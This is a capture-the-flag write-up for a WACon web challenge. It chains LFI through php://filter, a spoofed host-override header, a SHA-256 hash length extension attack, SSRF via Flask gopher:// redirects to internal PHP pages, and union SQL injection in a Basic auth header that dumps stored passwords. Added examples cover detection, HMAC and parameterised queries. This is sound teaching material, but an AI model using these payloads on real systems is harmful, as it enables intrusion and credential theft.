🚪 Intro

This is the first web challenge, and one that as many as 20 people solved.

Of course, I gave up on it during the contest; after the CTF ended I solved it with a hint and a friend's help.

The keywords for solving this challenge are:

`LFI`

`hash length extension attack`

`SSRF`

`SQLI`


💡 Analysis - Screen flow

Accessing the challenge site takes you to a login page.

After logging in, moving to a page called "fun" shows a page that looks like an SSRF challenge, as in the picture below.

http://114.203.209.112:8000/index.phtml?fun_004ded7246=load


Entering a value in the input field reveals that this feature only works against local addresses.

Bypassing that without the source code would be hard, so another way in is needed.


💡 Exploit - LFI

The page above has an LFI vulnerability: the parameter fun_004ded7246 carries the value load.

That looked like it `include`s a file named load.phtml.

http://114.203.209.112:8000/index.phtml?fun_004ded7246=load

So I leaked the source of load.phtml and index.phtml through php://filter.

http://114.203.209.112:8000/index.phtml?fun_004ded7246=php://filter/convert.base64-encode/resource=/var/www/html/load


💡 Exploit - Custom header

The code below is part of load.phtml.

Lines 64-66 are doing something; we will come back to that later.

On line 68, the value of the `HTTP_X_HTTP_HOST_OVERRIDE` header is assigned to `$IP`. On line 75 it has to equal 127.0.0.1 for the first of the conditions to pass.


So add the header in Burp as follows.

With that, `$IP` holds the value 127.0.0.1.


💡 Exploit - Hash Length Extension Attack

Looking at line 64, `X-SECRET` is a random value produced by `gen()`: it hashes with `sha1()` and returns 20 characters of the result.

Line 66 concatenates that `X-SECRET` with the string "guest", hashes the result with `sha256()`, and stores the digest in `X-TOKEN`.

(Third red box) The second condition is an integrity check against cookie tampering. With a randomly generated `X-SECRET` and sha256 there is no hope of a hash collision. There is, however, a way to bypass exactly this kind of integrity check: the hash length extension attack.


The hash length extension attack is explained well in the blog post below.

Hash Length extension attack - Length Extension Attack (eine.tistory.com)

In terms of this challenge, the situation is as follows:

1. We know the generated `X-TOKEN` value,

2. we do not know `X-SECRET`, but we know it is 20 characters long, and

3. `X-TOKEN` is produced by concatenating the unknown `X-SECRET` with the known string `guest`.

Using the attack, an attacker who does not know `X-SECRET` can still obtain a valid `X-TOKEN` for a value with extra data appended after guest. That bypasses the second and third if conditions at the same time.

I solved it with the HashPump tool the blog above describes. (Installation is left to you...)

GitHub - bwall/HashPump: A tool to exploit the hash length extension attack in various hashing algorithms (github.com)


Passing the following options to the tool yields a newly generated `X-TOKEN` and `USER` cookie.

`-s`: the existing `X-TOKEN` value (c9bb82c11134b7e76f44c2f01383f99fe9baa691ee90c7b1c6526dce8b67355e)

`-d`: the known data used when `X-TOKEN` was generated (guest)

`-a`: the data to append (admin)

`-k`: the length of `X-SECRET` (20)

Putting these values into the cookies and sending the request through Burp, the Google page is fetched successfully.

(One thing to watch: the tool's output contains \x00, which has to be rewritten as %00 before sending.)
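To make the three facts above and the \x00 note concrete, here is an added Python example (it is not the challenge's PHP and not HashPump). It builds X-TOKEN the way load.phtml does, sha256(secret || data); computes the Merkle-Damgård glue padding that a length-extended USER cookie must carry between guest and the appended data (this is what -k 20 is needed for, and where the \x80 and \x00 bytes in HashPump's output come from); percent-encodes it as the cookie has to be sent; shows a server-side check that recognises such a cookie; and shows the keyed HMAC construction that closes the hole. SECRET is a constructed 20-byte stand-in; the digest recomputation itself is left to HashPump.

```python
import hashlib
import hmac
import struct
from urllib.parse import quote, unquote_to_bytes

# Constructed stand-in for gen()'s output: 20 bytes, as in the challenge.
SECRET = b"s" * 20


def token_vulnerable(secret: bytes, data: bytes) -> str:
    """sha256(secret || data): the unkeyed prefix construction load.phtml uses."""
    return hashlib.sha256(secret + data).hexdigest()


def token_hmac(secret: bytes, data: bytes) -> str:
    """HMAC-SHA256(secret, data): keyed, so the digest cannot be extended."""
    return hmac.new(secret, data, hashlib.sha256).hexdigest()


def glue_padding(secret_len: int, known_data: bytes) -> bytes:
    """The padding SHA-256 appends to (secret || known_data) before hashing.

    A length-extended cookie must carry exactly these bytes between the known
    data and the appended data. Computing them needs only the secret's length
    (HashPump's -k); they are the \\x80 and \\x00 bytes in its output.
    """
    msg_len = secret_len + len(known_data)
    zeros = (55 - msg_len) % 64  # 0x80 plus zeros brings the length to 56 mod 64 ...
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", msg_len * 8)  # ... then the 64-bit bit length


def forged_user_value(known_data: bytes, appended: bytes, secret_len: int = 20) -> bytes:
    """Shape of the USER cookie after extension: known || glue || appended."""
    return known_data + glue_padding(secret_len, known_data) + appended


def cookie_encode(raw: bytes) -> str:
    """Percent-encode for transport, e.g. \\x00 -> %00 (the note above)."""
    return quote(raw, safe="")


def looks_length_extended(cookie_value: str, secret_len: int = 20) -> bool:
    """Server-side detection: does the cookie embed valid glue padding for any
    prefix? A legitimate USER value never contains raw SHA-256 padding."""
    raw = unquote_to_bytes(cookie_value)
    for i, byte in enumerate(raw):
        if byte == 0x80:
            glue = glue_padding(secret_len, raw[:i])
            if raw[i:i + len(glue)] == glue:
                return True
    return False


def verify(secret: bytes, user_value: bytes, token: str, keyed: bool) -> bool:
    """Constant-time check of X-TOKEN against X-SECRET and the USER value."""
    expected = token_hmac(secret, user_value) if keyed else token_vulnerable(secret, user_value)
    return hmac.compare_digest(expected, token)


if __name__ == "__main__":
    forged = forged_user_value(b"guest", b"admin")
    print(len(SECRET + b"guest" + glue_padding(20, b"guest")))  # 64: exactly one block
    print(cookie_encode(forged))
    print(looks_length_extended(cookie_encode(forged)))
```

With secret || "guest" being 25 bytes, the glue is 39 bytes, so the original token already committed to exactly one full 64-byte block; that is the property the extension relies on and the reason the secret's length, not its value, is all the attacker needs. HMAC removes it by mixing the key in at both ends, and `hmac.compare_digest` avoids leaking the comparison through timing.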

The intent of the challenge is not to reach google.com, though: the top of load.phtml reveals another php path.

However, `valid_url()` blocks access through internal IP addresses.

The next section explains how to get around that.


💡 Exploit - SSRF and gopher://

In the code below, the curl logic lives inside `get_data()`.

On line 46 the `CURLOPT_FOLLOWLOCATION` option is turned on, which means a 301 or 302 response is allowed to move the request to a different URL. This option is what lets us bypass `valid_url()`.


I built the attack environment with Flask.

The code that redirects into the internal network when a request reaches my server is as follows.

```python
from flask import Flask, redirect
import base64

app = Flask(__name__)


@app.route('/chall_1')
def chall_1():
    # challenge 1: redirect into the internal network.
    # The gopher:// URL makes curl write a raw "GET /internal_e0134cd5a917.php HTTP/1.0" request line.
    return redirect('gopher://localhost:80/_GET%20/internal_e0134cd5a917.php%20HTTP/1.0%0d%0a', code=301)


if __name__ == "__main__":
    app.run(debug=True, host="0.0.0.0", port=8080)
```

In this code, a request to /chall_1 is answered with a redirect, and the redirect target uses the gopher protocol.

Finally, handing the Flask server's address to the challenge reaches the internal IP and gives access to the challenge file.


The picture above reveals the path of the next php file.

Add the route below to the Flask code written earlier, with the other php file path.

The response says the Authorization header is missing. Adding it to the gopher payload in the same way moves us to the next step.

```python
@app.route("/chall_2")
def chall_2():
    # challenge 2: the same request plus an Authorization header
    # (YWxhZGRpbjpvcGVuc2VzYW1l is base64 of "aladdin:opensesame")
    return redirect("gopher://localhost:80/_GET%20/internal_1d607d2c193b.php%20HTTP/1.0%0d%0aAuthorization:%20Basic%20YWxhZGRpbjpvcGVuc2VzYW1l%0d%0a", code=301)
```

This time it says there is no POST data. Fill in the method, the content-type and the body.


💡 Exploit - SQLI

Passing the steps above leads to an SQL injection challenge; the injection point is the Authorization header.

So log in as admin as follows and pull admin's password, which yields the flag.

```python
@app.route("/chall_2_1")
def chall_2_1():
    # challenge 2-1: POST with a body, and the SQL injection inside the Basic credential
    # authentication = "admin:admin' union select 1,database(),3-- -"
    # authentication = "admin:admin' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='auth_user'),3-- -"
    authentication = "admin:admin' union select 1,group_concat(password),3 from auth_user limit 1-- -"
    auth_b64 = base64.b64encode(authentication.encode('ascii')).decode()
    post_body_data = "1"
    content_length = len(post_body_data)

    return redirect(f"gopher://localhost:80/_POST%20/internal_1d607d2c193b.php%20HTTP/1.0%0d%0aAuthorization:%20Basic%20{auth_b64}%0d%0aContent-Type:%20application/x-www-form-urlencoded%0d%0aContent-Length:%20{content_length}%0d%0a%0d%0a{post_body_data}", code=301)
```

 

`WACon{Try_using_Gophhhher_ffabcdbc}`
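What the final payload above does, and what stops it, as an added Python example (not the challenge's PHP; it uses an in-memory SQLite database rather than the MySQL-style backend the `database()` and `information_schema` probes imply, so only the `group_concat` payload is reproduced). The credential is decoded from the Basic header and either spliced into the query string, where the quote and the union take effect, or bound as a parameter, where the same bytes are merely a password that matches nothing. The auth_user table and its rows are constructed.

```python
import base64
import sqlite3

# Constructed stand-in for the challenge's auth_user table (table and column
# names follow the write-up's payload; the rows and passwords are made up).
SCHEMA = [
    "CREATE TABLE auth_user (id INTEGER, username TEXT, password TEXT)",
    "INSERT INTO auth_user VALUES (1, 'admin', 'constructed-admin-pw')",
    "INSERT INTO auth_user VALUES (2, 'guest', 'guest')",
]

# The final payload from the write-up, verbatim (the part after "admin:").
PAYLOAD = "admin' union select 1,group_concat(password),3 from auth_user limit 1-- -"


def make_db():
    conn = sqlite3.connect(":memory:")
    for stmt in SCHEMA:
        conn.execute(stmt)
    return conn


def basic_header(user, password):
    """Build the 'Basic ...' value the way the Flask route above does."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def parse_basic_auth(header_value):
    """Decode 'Basic <base64(user:pass)>' into (user, pass). Decoding is not
    validation: the injection rides inside the decoded credential."""
    scheme, _, b64 = header_value.partition(" ")
    if scheme != "Basic":
        raise ValueError("unsupported auth scheme")
    user, _, password = base64.b64decode(b64).decode().partition(":")
    return user, password


def login_vulnerable(conn, header_value):
    """String-built query: the decoded password is parsed as SQL."""
    user, password = parse_basic_auth(header_value)
    sql = ("SELECT id, username, password FROM auth_user "
           f"WHERE username='{user}' AND password='{password}'")
    return conn.execute(sql).fetchone()


def login_safe(conn, header_value):
    """Parameterised query: the same bytes are bound as a value, never parsed."""
    user, password = parse_basic_auth(header_value)
    sql = "SELECT id, username, password FROM auth_user WHERE username=? AND password=?"
    return conn.execute(sql, (user, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    header = basic_header("admin", PAYLOAD)
    print("vulnerable:", login_vulnerable(db, header))  # column 2 holds every password
    print("safe:      ", login_safe(db, header))        # None
```

The vulnerable path returns the union's row, so whatever the page renders as the username is the concatenated password list; the parameterised path returns nothing, and the literal `'` in the credential never reaches the SQL parser. Logging decoded Basic credentials that contain quotes or SQL keywords is a cheap detection signal for this kind of probe.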
